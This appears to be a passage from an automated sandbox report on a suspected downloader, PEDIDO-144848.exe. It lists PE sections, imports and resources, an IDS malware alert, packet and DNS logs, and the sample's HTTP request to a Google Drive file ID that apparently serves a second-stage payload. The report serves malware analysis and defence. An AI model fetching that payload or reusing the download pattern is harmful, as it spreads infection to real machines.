IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5e4a | 0x6000 | 30c42419b2e69d0fb178ad82fde5a6a6 | False | 0.6707356770833334 | data | 6.461674766148295 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1246 | 0x1400 | 43fab6a80651bd97af8f34ecf44cd8ac | False | 0.42734375 | data | 5.005029341587408 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x399038 | 0x400 | 295703f29cbf0cc87537f54786ed1d01 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x3a3000 | 0x20000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3c3000 | 0x28340 | 0x28400 | 0a923a42d1a39b5e7ff4cbf67045065c | False | 0.21775524068322982 | data | 4.016272150271427 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3c3358 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.1348337868212469
RT_ICON | 0x3d3b80 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.24942190456169855
RT_ICON | 0x3dd028 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.286090573012939
RT_ICON | 0x3e24b0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.2502952290977799
RT_ICON | 0x3e66d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.3522821576763486
RT_ICON | 0x3e8c80 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.37828330206378985
RT_ICON | 0x3e9d28 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.4668032786885246
RT_ICON | 0x3ea6b0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5106382978723404
RT_DIALOG | 0x3eab18 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x3eac18 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x3ead38 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x3eae00 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x3eae60 | 0x76 | data | English | United States | 0.7542372881355932
RT_VERSION | 0x3eaed8 | 0x128 | data | English | United States | 0.6114864864864865
RT_MANIFEST | 0x3eb000 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
KERNEL32.dll | SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll | RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-07T19:25:58.193729+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.20 | 49748 | 142.250.80.46 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Oct 7, 2024 19:26:00.897567987 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.897775888 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.897788048 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.897983074 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.905885935 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.906158924 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.906171083 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.906384945 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.913650036 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.913885117 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.913897038 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.914107084 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.921077967 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.921262980 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.921276093 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.921457052 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.928814888 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.929030895 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.929044008 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.929286003 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.936357021 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.936568022 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.936580896 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.936789036 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.944140911 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.944346905 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.947701931 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.947989941 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.948002100 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.948266983 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.965533018 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.965874910 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.965886116 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.966171026 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.968986034 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.969257116 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.969275951 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.969573021 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.975924969 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.976353884 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.976367950 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.976587057 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.981930971 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.982225895 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.982239008 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.982449055 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.988085032 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.988362074 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.988374949 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.988583088 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.994569063 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.994611025 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.994793892 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.994812012 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.994910955 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.000489950 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.000734091 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.000746012 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.000977039 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.006738901 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.007033110 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.007045984 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.007225990 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.012506962 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.012763023 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.013031960 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.013216972 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.018639088 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.018902063 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.018913984 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.019900084 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.024621964 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.025466919 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.025479078 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.025753975 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.030714035 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.030900002 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.033858061 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.034569979 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.034583092 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.034899950 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.040024996 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.040206909 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.040220022 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.040400982 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.046006918 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.046165943 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.046176910 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.046833038 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.051764965 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.052212954 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.052227020 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.052464962 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.057193995 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.057430983 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.057442904 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.057612896 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.062335014 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.062618971 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.062630892 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.062819958 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.067287922 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.067549944 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.067560911 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.067737103 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.072370052 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.072599888 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.072614908 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.072767973 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.077591896 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.077867985 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.077878952 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.078088045 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.082639933 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.082859993 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.082871914 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.083132982 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.087361097 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.087578058 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.087589979 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.087801933 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.092109919 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.092358112 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.092370987 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.092586040 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.095000982 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.095179081 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.096941948 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.097115993 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.097126007 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.097310066 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.099721909 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.099922895 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.099935055 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.100080967 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.103032112 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.103187084 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.103197098 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.103355885 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.105967045 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.106125116 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.106136084 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.106266975 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.108706951 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.108896017 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.108906031 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.109036922 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.111769915 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.112000942 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.112014055 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.112195969 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.114708900 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.114866972 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.115087032 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.115263939 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.118191957 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.118395090 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.118403912 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.118578911 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.120595932 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.120790958 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.120800972 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.120970964 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.123584032 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.123780012 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.123790979 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.123960972 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.126441002 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.126614094 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.126622915 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.126807928 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.129324913 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.129564047 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.129575014 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.129745007 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.132213116 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.132431030 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.133564949 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.133738041 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.133748055 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.133950949 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.136481047 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.136687994 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.136698961 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.136869907 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.139391899 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.139580011 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.139589071 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.139761925 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.142031908 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.142188072 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.142198086 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.142328978 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.144766092 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.144987106 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.145155907 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.145349979 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.147407055 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.147623062 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.148044109 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.148255110 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.150315046 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.150495052 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.150506020 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.150702000 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.153043032 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.153228998 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.153353930 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.153523922 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.155539989 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.155725002 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.155735016 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.155919075 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.158272982 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.158451080 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.158461094 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.158684015 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.160928011 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.161115885 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.161125898 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.161257982 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.163229942 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.163378000 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.163387060 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.163520098 CEST49749443192.168.11.20142.251.40.97
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2024 19:25:57.590415955 CEST | 56071 | 53 | 192.168.11.20 | 1.1.1.1
Oct 7, 2024 19:25:57.687294006 CEST | 53 | 56071 | 1.1.1.1 | 192.168.11.20
Oct 7, 2024 19:25:58.228408098 CEST | 50552 | 53 | 192.168.11.20 | 1.1.1.1
Oct 7, 2024 19:25:58.323803902 CEST | 53 | 50552 | 1.1.1.1 | 192.168.11.20

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 7, 2024 19:25:57.590415955 CEST | 192.168.11.20 | 1.1.1.1 | 0x51df | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Oct 7, 2024 19:25:58.228408098 CEST | 192.168.11.20 | 1.1.1.1 | 0xb8d9 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 7, 2024 19:25:57.687294006 CEST | 1.1.1.1 | 192.168.11.20 | 0x51df | No error (0) | drive.google.com |  | 142.250.80.46 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 19:25:58.323803902 CEST | 1.1.1.1 | 192.168.11.20 | 0xb8d9 | No error (0) | drive.usercontent.google.com |  | 142.251.40.97 | A (IP address) | IN (0x0001) | false

                                                      • drive.google.com
                                                      • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49748 | 142.250.80.46 | 443 | 7228 | C:\Users\user\Desktop\PEDIDO-144848.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-07 17:25:57 UTC | 216 | OUT | GET /uc?export=download&id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
2024-10-07 17:25:58 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Mon, 07 Oct 2024 17:25:58 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: script-src 'nonce-rYuhXGrY6aYEFAJ7NtjEiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
